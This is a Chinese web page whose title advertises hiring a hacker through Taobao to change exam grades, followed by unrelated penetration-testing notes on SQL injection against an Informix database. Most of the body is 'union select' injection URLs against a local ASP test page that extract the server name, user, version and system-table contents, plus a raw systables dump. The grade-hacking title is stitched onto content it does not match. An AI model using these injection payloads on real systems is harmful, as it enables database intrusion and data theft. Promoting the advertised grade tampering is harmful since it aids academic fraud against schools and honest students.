淘宝找黑客改成绩(黑客改一门成绩多少钱)
前些时间做一个渗透测试,数据库是informix的。整理了一下。informix数据类型比较复杂,在union查询中最郁闷的就是匹配字段的问题数据类型如下informix的字段类型char(size)varchar(size)serialnchar(size)nvarchar(size)realintervaldatedatetimeintegersmallintfloatsmallfloatmoney(p,s)decimal(p,s)textbyte如果字段数量和类型都匹配了 那么得到数据很容易****************************************************测试环境:reate table test(name char(32),id int)****************************************************ASP代码=========================================================================================================http://127.0.0.1/aaa.asp?id=1 and 1=1 union select dbservername from systables;dbservername,返回数据库服务器的名称http://127.0.0.1/aaa.asp?id=1 and 1=1 union select user from systables;user,返回执行查询的用户的用户名(登陆帐户名)http://127.0.0.1/aaa.asp?id=1 and 1=1 union select to_char(today) from systables;http://127.0.0.1/aaa.asp?id=1 and 1=1 union select to_char(dbinfo(’sqlca.sqlerrd1’)) from systables;返回任何表中插入的最后一个SERIAL值http://127.0.0.1/aaa.asp?id=1 and 1=1 union select to_char(dbinfo(’version’, ’full’)) from systables;***************************************************************************************************************************得到任何数据两个重要的系统表systables:描述数据库中的很张表;syscolumns:描述数据库中表的列;==============================================select * from systablestabname syscolumnsowner informixpartnum 1048580tabid 2rowsize 157ncols 10nindexes 2nrows 2353.000000000created 04/28/2008version 65539tabtype Tlocklevel Rnpused 25.00000000000fextsize 32nextsize 32flags 0sitedbnametype_xid 0am_id 0
